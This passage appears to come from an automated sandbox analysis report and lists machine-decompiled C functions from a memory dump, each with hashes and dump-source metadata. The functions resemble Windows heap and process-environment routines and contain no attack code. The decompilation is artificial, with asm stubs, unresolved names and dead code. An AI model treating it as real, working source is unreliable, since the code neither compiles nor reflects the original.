                        • Opcode Fuzzy Hash: ec0c49ccbc30ddae079f8cedb02e3033c4ee9264d6420c4d0a93526b052587f5
                        • Instruction Fuzzy Hash: 65F06D71E10648EFDB05EFA8D405AAEB7F8EF08300F4440A9E915EB381EA749900CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02B1C577(void* __ecx, char _a4) {
                        				void* __esi;
                        				void* __ebp;
                        				void* _t17;
                        				void* _t19;
                        				void* _t20;
                        				void* _t21;
                        
                        				_t18 = __ecx;
                        				_t21 = __ecx;
                        				if(__ecx == 0 ||  *((char*)(__ecx + 0xdd)) != 0 || E02B1C5D5(__ecx, _t19) == 0 ||  *((intOrPtr*)(__ecx + 4)) != 0x2ad11cc ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                        					__eflags = _a4;
                        					if(__eflags != 0) {
                        						L10:
                        						E02BC88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                        						L9:
                        						return 0;
                        					}
                        					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                        					if(__eflags == 0) {
                        						goto L10;
                        					}
                        					goto L9;
                        				} else {
                        					return 1;
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 406392f45f11c1100dc4aa563378d0eae00bcac9dc01fcba1450eddb58e937c8
                        • Instruction ID: 802a82918bbbc105274a652802463b424be150cab6f3cbeb9aa29e2590839a79
                        • Opcode Fuzzy Hash: 406392f45f11c1100dc4aa563378d0eae00bcac9dc01fcba1450eddb58e937c8
                        • Instruction Fuzzy Hash: 29F0E2B29956909FD732C728C006B22BFEADB05778FD484EBE40A87643C7A4D880C757
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 54%
                        			E02B3927A(void* __ecx) {
                        				signed int _t11;
                        				void* _t14;
                        
                        				_t11 = L02B14620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x98);
                        				if(_t11 != 0) {
                        					E02B3FA60(_t11, 0, 0x98);
                        					asm("movsd");
                        					asm("movsd");
                        					asm("movsd");
                        					asm("movsd");
                        					 *(_t11 + 0x1c) =  *(_t11 + 0x1c) & 0x00000000;
                        					 *((intOrPtr*)(_t11 + 0x24)) = 1;
                        					E02B392C6(_t11, _t14);
                        				}
                        				return _t11;
                        			}

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                        • Instruction ID: a379f0163b5518300cbd028abbddfae6e32f9350a1f8036917cdfe5e347227e2
                        • Opcode Fuzzy Hash: fb98b62dac83db7e13ee253788b92f70b835eb404f2827a387eedf494df67516
                        • Instruction Fuzzy Hash: E5E09B723409406BD7129E55DC84F57776EEF82725F0440B9F5045E252C6F5DD098BA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 94%
                        			E02BB2073(void* __ebx, void* __ecx, void* __edi, void* __eflags) {
                        				void* __esi;
                        				signed char _t3;
                        				signed char _t7;
                        				void* _t19;
                        
                        				_t17 = __ecx;
                        				_t3 = E02BAFD22(__ecx);
                        				_t19 =  *0x2be849c - _t3; // 0x0
                        				if(_t19 == 0) {
                        					__eflags = _t17 -  *0x2be8748; // 0x0
                        					if(__eflags <= 0) {
                        						E02BB1C06();
                        						_t3 =  *((intOrPtr*)( *[fs:0x30] + 2));
                        						__eflags = _t3;
                        						if(_t3 != 0) {
                        							L5:
                        							__eflags =  *0x2be8724 & 0x00000004;
                        							if(( *0x2be8724 & 0x00000004) == 0) {
                        								asm("int3");
                        								return _t3;
                        							}
                        						} else {
                        							_t3 =  *0x7ffe02d4 & 0x00000003;
                        							__eflags = _t3 - 3;
                        							if(_t3 == 3) {
                        								goto L5;
                        							}
                        						}
                        					}
                        					return _t3;
                        				} else {
                        					_t7 =  *0x2be8724; // 0x0
                        					return E02BA8DF1(__ebx, 0xc0000374, 0x2be5890, __edi, __ecx,  !_t7 >> 0x00000002 & 0x00000001,  !_t7 >> 0x00000002 & 0x00000001);
                        				}
                        			}

                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2dd955b8a68a7c03d6652be537359bc334419bab584b4363ecf9bf20353c1c05
                        • Instruction ID: 457495f6fa8537bf0ddc956e5b9903b8aa8968d856ee1d1d150d119d78893590
                        • Opcode Fuzzy Hash: 2dd955b8a68a7c03d6652be537359bc334419bab584b4363ecf9bf20353c1c05
                        • Instruction Fuzzy Hash: 74F0E57B825585CADF336B2871123F23B95DF45294F8D18C6DC945F208C6B58893CF61
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 43%
                        			E02BC8D34(intOrPtr __ecx, intOrPtr __edx) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				intOrPtr _v16;
                        				short _v42;
                        				char _v48;
                        				signed char* _t12;
                        				intOrPtr _t18;
                        				intOrPtr _t24;
                        				intOrPtr _t25;
                        				signed int _t26;
                        
                        				_t23 = __edx;
                        				_v8 =  *0x2bed360 ^ _t26;
                        				_v16 = __ecx;
                        				_v42 = 0x1c2b;
                        				_v12 = __edx;
                        				if(E02B17D50() == 0) {
                        					_t12 = 0x7ffe0386;
                        				} else {
                        					_t12 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        				}
                        				_push( &_v48);
                        				_push(8);
                        				_push(0x20402);
                        				_push( *_t12 & 0x000000ff);
                        				return E02B3B640(E02B39AE0(), _t18, _v8 ^ _t26, _t23, _t24, _t25);
                        			}














                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7b64b223c95781e6cf8e4ac0034f954eeb91b9f9a980c5b2a9b1e2e78f07aef0
                        • Instruction ID: 4b29d10823d315600eb778b8278378ded037e272fba73a8e36487a0c87b2d80d
                        • Opcode Fuzzy Hash: 7b64b223c95781e6cf8e4ac0034f954eeb91b9f9a980c5b2a9b1e2e78f07aef0
                        • Instruction Fuzzy Hash: 8CF0BE70E44A0CAFCB04EFB8D441A6EB7B8EF08300F5084D9E915EB281EA34D900CB54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 36%
                        			E02BC8B58(intOrPtr __ecx) {
                        				signed int _v8;
                        				intOrPtr _v20;
                        				short _v46;
                        				char _v52;
                        				signed char* _t11;
                        				intOrPtr _t17;
                        				intOrPtr _t22;
                        				intOrPtr _t23;
                        				intOrPtr _t24;
                        				signed int _t25;
                        
                        				_v8 =  *0x2bed360 ^ _t25;
                        				_v20 = __ecx;
                        				_v46 = 0x1c26;
                        				if(E02B17D50() == 0) {
                        					_t11 = 0x7ffe0386;
                        				} else {
                        					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        				}
                        				_push( &_v52);
                        				_push(4);
                        				_push(0x402);
                        				_push( *_t11 & 0x000000ff);
                        				return E02B3B640(E02B39AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                        			}














                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 1cf19297dc09b1dd64e77d37603f40fde6e8e167e20b1c71094a66df649dbf62
                        • Instruction ID: e4fb139330b7f0c6b7b81f46bee65340496b5296a76a217727d98bd4dde4402a
                        • Opcode Fuzzy Hash: 1cf19297dc09b1dd64e77d37603f40fde6e8e167e20b1c71094a66df649dbf62
                        • Instruction Fuzzy Hash: 21F082B0A44658ABDB05EBA8D906E6EB3B8EF04304F540499F915DB3C1EB74D900CB94
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02AF4F2E(void* __ecx, char _a4) {
                        				void* __esi;
                        				void* __ebp;
                        				void* _t17;
                        				void* _t19;
                        				void* _t20;
                        				void* _t21;
                        
                        				_t18 = __ecx;
                        				_t21 = __ecx;
                        				if(__ecx == 0) {
                        					L6:
                        					__eflags = _a4;
                        					if(__eflags != 0) {
                        						L8:
                        						E02BC88F5(_t17, _t18, _t19, _t20, _t21, __eflags);
                        						L9:
                        						return 0;
                        					}
                        					__eflags =  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28));
                        					if(__eflags != 0) {
                        						goto L9;
                        					}
                        					goto L8;
                        				}
                        				_t18 = __ecx + 0x30;
                        				if(E02B1C5D5(__ecx + 0x30, _t19) == 0 ||  *((intOrPtr*)(__ecx + 0x34)) != 0x2ad1030 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                        					goto L6;
                        				} else {
                        					return 1;
                        				}
                        			}










                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 7b58accea1597694cda8cc790d3eb9211838fb7cacc0d8cd139fcc7e3fb1f6d2
                        • Instruction ID: dbbbb2171a4f09634507bbee54d32ecfa46e9801616312f73325229d4ef61fa3
                        • Opcode Fuzzy Hash: 7b58accea1597694cda8cc790d3eb9211838fb7cacc0d8cd139fcc7e3fb1f6d2
                        • Instruction Fuzzy Hash: AAF0E232929AA48FD7B1E758C1D0B22B7E4EF0C7B8F454CE5D8058B921EB24ED40CA40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 36%
                        			E02BC8CD6(intOrPtr __ecx) {
                        				signed int _v8;
                        				intOrPtr _v12;
                        				short _v38;
                        				char _v44;
                        				signed char* _t11;
                        				intOrPtr _t17;
                        				intOrPtr _t22;
                        				intOrPtr _t23;
                        				intOrPtr _t24;
                        				signed int _t25;
                        
                        				_v8 =  *0x2bed360 ^ _t25;
                        				_v12 = __ecx;
                        				_v38 = 0x1c2d;
                        				if(E02B17D50() == 0) {
                        					_t11 = 0x7ffe0386;
                        				} else {
                        					_t11 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                        				}
                        				_push( &_v44);
                        				_push(0xffffffe4);
                        				_push(0x402);
                        				_push( *_t11 & 0x000000ff);
                        				return E02B3B640(E02B39AE0(), _t17, _v8 ^ _t25, _t22, _t23, _t24);
                        			}














                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0e6625327def36e2292b8dd90b16bbc25c318907f0afe7df810b29e93459d292
                        • Instruction ID: 5648c88fd6ebc686e89ee80e9cbe8a4ac85f0e4f62539dbd75bba94feaeb19da
                        • Opcode Fuzzy Hash: 0e6625327def36e2292b8dd90b16bbc25c318907f0afe7df810b29e93459d292
                        • Instruction Fuzzy Hash: 08F08270A0460CABCB05DFA8D945E6EB7B8EF09304F6001DDE916EB2C1EA34D900CB54
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 88%
                        			E02B1746D(short* __ebx, void* __ecx, void* __edi, intOrPtr __esi) {
                        				signed int _t8;
                        				void* _t10;
                        				short* _t17;
                        				void* _t19;
                        				intOrPtr _t20;
                        				void* _t21;
                        
                        				_t20 = __esi;
                        				_t19 = __edi;
                        				_t17 = __ebx;
                        				if( *((char*)(_t21 - 0x25)) != 0) {
                        					if(__ecx == 0) {
                        						E02B0EB70(__ecx, 0x2be79a0);
                        					} else {
                        						asm("lock xadd [ecx], eax");
                        						if((_t8 | 0xffffffff) == 0) {
                        							_push( *((intOrPtr*)(__ecx + 4)));
                        							E02B395D0();
                        							L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0,  *((intOrPtr*)(_t21 - 0x50)));
                        							_t17 =  *((intOrPtr*)(_t21 - 0x2c));
                        							_t20 =  *((intOrPtr*)(_t21 - 0x3c));
                        						}
                        					}
                        					L10:
                        				}
                        				_t10 = _t19 + _t19;
                        				if(_t20 >= _t10) {
                        					if(_t19 != 0) {
                        						 *_t17 = 0;
                        						return 0;
                        					}
                        				}
                        				return _t10;
                        				goto L10;
                        			}










                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 2e3d5b615993ffd9685366caaef177c6328db9a67159e786d8d62af4bcd9f1a4
                        • Instruction ID: 0081df9a6c420016fb03416ef232aba6379a16e323f3ae1613f49e03db44847e
                        • Opcode Fuzzy Hash: 2e3d5b615993ffd9685366caaef177c6328db9a67159e786d8d62af4bcd9f1a4
                        • Instruction Fuzzy Hash: E6F0E935D00544ABDF0297A8C442B79FFB2EF04314F8805D5D951AB160EF64D800DB85
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02B2A44B(signed int __ecx) {
                        				intOrPtr _t13;
                        				signed int _t15;
                        				signed int* _t16;
                        				signed int* _t17;
                        
                        				_t13 =  *0x2be7b9c; // 0x0
                        				_t15 = __ecx;
                        				_t16 = L02B14620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13 + 0xc0000, 8 + __ecx * 4);
                        				if(_t16 == 0) {
                        					return 0;
                        				}
                        				 *_t16 = _t15;
                        				_t17 =  &(_t16[2]);
                        				E02B3FA60(_t17, 0, _t15 << 2);
                        				return _t17;
                        			}








                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: faf889e8783767545cfd5f0c834ba566c336d46624e99467d015b3aa1a481b64
                        • Instruction ID: 0ad0784a9dc62eef855511f1e4aabaa4dbad9aff9b851e621de1b4022b1ce4e2
                        • Opcode Fuzzy Hash: faf889e8783767545cfd5f0c834ba566c336d46624e99467d015b3aa1a481b64
                        • Instruction Fuzzy Hash: B9E09272A41421ABD2125A58AC40F66B3AEDBD4755F0944B5E908C7220DA28DD15C7E0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 79%
                        			E02AFF358(void* __ecx, signed int __edx) {
                        				char _v8;
                        				signed int _t9;
                        				void* _t20;
                        
                        				_push(__ecx);
                        				_t9 = 2;
                        				_t20 = 0;
                        				if(E02B2F3D5( &_v8, _t9 * __edx, _t9 * __edx >> 0x20) >= 0 && _v8 != 0) {
                        					_t20 = L02B14620( &_v8,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v8);
                        				}
                        				return _t20;
                        			}







                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                        • Instruction ID: f022d6e44bc89e91d704c8b642260ba849e5218df0b1e3370a88fb1adca33dfa
                        • Opcode Fuzzy Hash: 61dda8323ae8c861ea8f02d60a1be81a40b0a62d8b7407e3baae4fe75ca8acd3
                        • Instruction Fuzzy Hash: EEE0D833A40118BFCB6196D99E05F6ABBBDDB44B60F0041D5BA04D7590D9789D00C6D0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02B0FF60(intOrPtr _a4) {
                        				void* __ecx;
                        				void* __ebp;
                        				void* _t13;
                        				intOrPtr _t14;
                        				void* _t15;
                        				void* _t16;
                        				void* _t17;
                        
                        				_t14 = _a4;
                        				if(_t14 == 0 || ( *(_t14 + 0x68) & 0x00030000) != 0 ||  *((intOrPtr*)(_t14 + 4)) != 0x2ad11a4 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                        					return E02BC88F5(_t13, _t14, _t15, _t16, _t17, __eflags);
                        				} else {
                        					return E02B10050(_t14);
                        				}
                        			}











                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 395dc550d23ff52c87e5b6fb6f1ce5f43f61cb9d787c7b60ebc1c842e44c6487
                        • Instruction ID: d09f5444e603f1053418d97d1d740e29a6120714f576503e225484b55b9418e1
                        • Opcode Fuzzy Hash: 395dc550d23ff52c87e5b6fb6f1ce5f43f61cb9d787c7b60ebc1c842e44c6487
                        • Instruction Fuzzy Hash: 70E09AB030E2049FD736DB51D1A0F353B98DB42721F1984DDE4084B981CF61E881C606
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02BAD380(void* __ecx, void* __edx, intOrPtr _a4) {
                        				void* _t5;
                        
                        				if(_a4 != 0) {
                        					_t5 = L02AFE8B0(__ecx, _a4, 0xfff);
                        					L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _a4);
                        					return _t5;
                        				}
                        				return 0xc000000d;
                        			}





                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                        • Instruction ID: 711814755eb845207e476b3d8987b32a80a63f6636de14d1455117acf7061068
                        • Opcode Fuzzy Hash: 07c5925e52f8afa1b7907533c1bd4f73c0082095210f26f206316f10964d23b8
                        • Instruction Fuzzy Hash: A7E0C231284205BBDB226E44CD10FA9BB57DF407A0F108071FE085BBA0CA759C91EAC4
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 82%
                        			E02B841E8(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                        				void* _t5;
                        				void* _t14;
                        
                        				_push(8);
                        				_push(0x2bd08f0);
                        				_t5 = E02B4D08C(__ebx, __edi, __esi);
                        				if( *0x2be87ec == 0) {
                        					E02B0EEF0( *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        					 *(_t14 - 4) =  *(_t14 - 4) & 0x00000000;
                        					if( *0x2be87ec == 0) {
                        						 *0x2be87f0 = 0x2be87ec;
                        						 *0x2be87ec = 0x2be87ec;
                        						 *0x2be87e8 = 0x2be87e4;
                        						 *0x2be87e4 = 0x2be87e4;
                        					}
                        					 *(_t14 - 4) = 0xfffffffe;
                        					_t5 = L02B84248();
                        				}
                        				return E02B4D0D1(_t5);
                        			}






                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: a6dcb4d3a0bbbd848b9308fb7b32bf11c12d9e27ccb7f7a7957560a9f0580db6
                        • Instruction ID: 7b1b81b3f7973ab0403bab848ecc7d06ba26e2d5e64f7759c5beaac66a01295a
                        • Opcode Fuzzy Hash: a6dcb4d3a0bbbd848b9308fb7b32bf11c12d9e27ccb7f7a7957560a9f0580db6
                        • Instruction Fuzzy Hash: C1F03279DA1B01CFDFA0EFA8D6027083AB5F7443A0F0049AED0498B2A4DB34A494DF03
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02B2A185() {
                        				void* __ecx;
                        				intOrPtr* _t5;
                        
                        				if( *0x2be67e4 >= 0xa) {
                        					if(_t5 < 0x2be6800 || _t5 >= 0x2be6900) {
                        						return L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t5);
                        					} else {
                        						goto L1;
                        					}
                        				} else {
                        					L1:
                        					return E02B10010(0x2be67e0, _t5);
                        				}
                        			}






                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 9bacd6940e143bf84cfb9a338dea2a75c432debb4cb22c37f1ab85e90b70dc75
                        • Instruction ID: 7ef71122857b97d3b50867c8eed50efb8648cb997aa59b283caaaa248631e8a7
                        • Opcode Fuzzy Hash: 9bacd6940e143bf84cfb9a338dea2a75c432debb4cb22c37f1ab85e90b70dc75
                        • Instruction Fuzzy Hash: E2D02E326601209ACF2D7B008C58B22231BEBA8B21F300CCDF20B0B9A0DF60C8E8D509
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02B216E0(void* __edx, void* __eflags) {
                        				void* __ecx;
                        				void* _t3;
                        
                        				_t3 = E02B21710(0x2be67e0);
                        				if(_t3 == 0) {
                        					_t6 =  *[fs:0x30];
                        					if( *((intOrPtr*)( *[fs:0x30] + 0x18)) == 0) {
                        						goto L1;
                        					} else {
                        						return L02B14620(_t6,  *((intOrPtr*)(_t6 + 0x18)), 0, 0x20);
                        					}
                        				} else {
                        					L1:
                        					return _t3;
                        				}
                        			}






                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: e7a4576458357286551d25ad8bb444f5af86349c6de12d02092cedce1654f29a
                        • Instruction ID: 048674a50b83900dba92ca5008181b72ee0a04c2ef14871ed71fec4a4bac9622
                        • Opcode Fuzzy Hash: e7a4576458357286551d25ad8bb444f5af86349c6de12d02092cedce1654f29a
                        • Instruction Fuzzy Hash: F6D0A77111030052DE2E5F189804B193257DBC0789F3800DCF10F594D2CFB4CC96E448
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02B753CA(void* __ebx) {
                        				intOrPtr _t7;
                        				void* _t13;
                        				void* _t14;
                        				intOrPtr _t15;
                        				void* _t16;
                        
                        				_t13 = __ebx;
                        				if( *((char*)(_t16 - 0x65)) != 0) {
                        					E02B0EB70(_t14,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        					_t7 =  *((intOrPtr*)(_t16 - 0x64));
                        					_t15 =  *((intOrPtr*)(_t16 - 0x6c));
                        				}
                        				if(_t15 != 0) {
                        					L02B177F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t13, _t15);
                        					return  *((intOrPtr*)(_t16 - 0x64));
                        				}
                        				return _t7;
                        			}









                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                        • Instruction ID: 63c252997067ed78383736df9aecfbcfaa3f22c84e05e77283350bf3f3b77fad
                        • Opcode Fuzzy Hash: 67b7ac285cf5eeec7b30a6c71a9a804199707b28aa5e3d1143cb4169285b8378
                        • Instruction Fuzzy Hash: E6E0EC719446849FCF23EB59CA90F5EB7F6FB44B40F554494A4196B671C764ED00CB40
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02B0AAB0() {
                        				intOrPtr* _t4;
                        
                        				_t4 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                        				if(_t4 != 0) {
                        					if( *_t4 == 0) {
                        						goto L1;
                        					} else {
                        						return  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x1e;
                        					}
                        				} else {
                        					L1:
                        					return 0x7ffe0030;
                        				}
                        			}





                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                        • Instruction ID: 54c507718502ab970dadfc6b89d92450e52720d60fe8c0c11ce3764dabbae46f
                        • Opcode Fuzzy Hash: 0e648023605194c2b3aa9f86d2ec8309cbf58e884a879224c73f234beb57dbf0
                        • Instruction Fuzzy Hash: BAD0E935352A90CFD617DB5DC594B1577A4FB44B84FC509D0E901CB762E72CD984CA00
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02B235A1(void* __eax, void* __ebx, void* __ecx) {
                        				void* _t6;
                        				void* _t10;
                        				void* _t11;
                        
                        				_t10 = __ecx;
                        				_t6 = __eax;
                        				if( *((intOrPtr*)(_t11 - 0x34)) >= 0 && __ebx != 0) {
                        					 *((intOrPtr*)(__ecx + 0x294)) =  *((intOrPtr*)(__ecx + 0x294)) + 1;
                        				}
                        				if( *((char*)(_t11 - 0x1a)) != 0) {
                        					return E02B0EB70(_t10,  *((intOrPtr*)( *[fs:0x30] + 0x1c)));
                        				}
                        				return _t6;
                        			}







                        Memory Dump Source
                        • Source File: 0000000B.00000002.621056295.0000000002AD0000.00000040.00000001.sdmp, Offset: 02AD0000, based on PE: true
                        • Associated: 0000000B.00000002.621637216.0000000002BEB000.00000040.00000001.sdmp
                        • Associated: 0000000B.00000002.621660865.0000000002BEF000.00000040.00000001.sdmp
                        Similarity
                        • API ID:
                        • String ID:
                        • API String ID:
                        • Opcode ID: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                        • Instruction ID: 45cc7dfc014045e9dd69f7af1cf6fd63b31b301676244e2de48ca428263eefc7
                        • Opcode Fuzzy Hash: 750563defb44073a80ffdee3a2c6a0b0b2386ed4e1eb18000b2b3230dd36d4d9
                        • Instruction Fuzzy Hash: 27D0C9315513949ADB52AB60C25876877FBFB00218F5824E5944E1699FC33E8A5EDA01
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E02AFDB40() {
                        				signed int* _t3;
                        				void* _t5;
                        
                        				_t3 = L02B14620(_t5,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, 0x64);
                        				if(_t3 == 0) {
                        					return 0;
                        				} else {
